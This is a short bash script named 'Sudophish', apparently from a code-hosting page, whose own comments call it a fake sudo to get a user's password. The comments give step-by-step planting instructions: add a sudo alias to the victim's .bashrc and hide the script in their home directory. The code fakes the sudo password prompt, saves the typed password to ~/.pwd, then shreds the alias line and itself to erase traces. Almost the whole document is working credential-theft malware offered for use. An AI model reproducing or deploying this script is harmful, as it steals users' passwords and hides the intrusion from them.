sp.sh (985B)
1 #!/bin/bash 2 3 # Sudophish 4 # 5 # A fake sudo to get a user's password 6 # By Michael C. Dim - mk@mcdim.xyz 7 8 # 1. Add this line to *THE END* of the user's 9 # .bashrc or .zshrc or .mkshrc etc. : 10 # 11 # alias sudo="~/.sp.sh; sudo" 12 # 13 # 2. Put this script in the user's home 14 # directory as ~/.sp.sh 15 # 16 # 3. The password will be stored in ~/.pwd 17 # 18 # 4. This script and the last .bashrc line 19 # will self-destruct and be shredded. 20 21 shellfile=".bashrc" 22 echo -n '[sudo] password for '$USER': ' 23 read -s password 24 echo "" 25 26 # Comment the following line if the user 27 # does not need a password to use sudo 28 echo "Password is wrong, please try again" 29 30 # Save the password 31 echo "$password" > ~/.pwd 32 33 # Shred the line 34 dellastline() { 35 cp "$shellfile" "$shellfile".tmp 36 sed '$d' "$shellfile".tmp > "$shellfile" 37 shred -fu "$shellfile".tmp 38 } 39 40 dellastline 41 echo "00000000000000000000000000" >> "$shellfile" 42 dellastline 43 source "$shellfile" 44 45 # Self-destruct 46 shred -fu "$0" && echo "#" > "$0" && chmod +x "$0"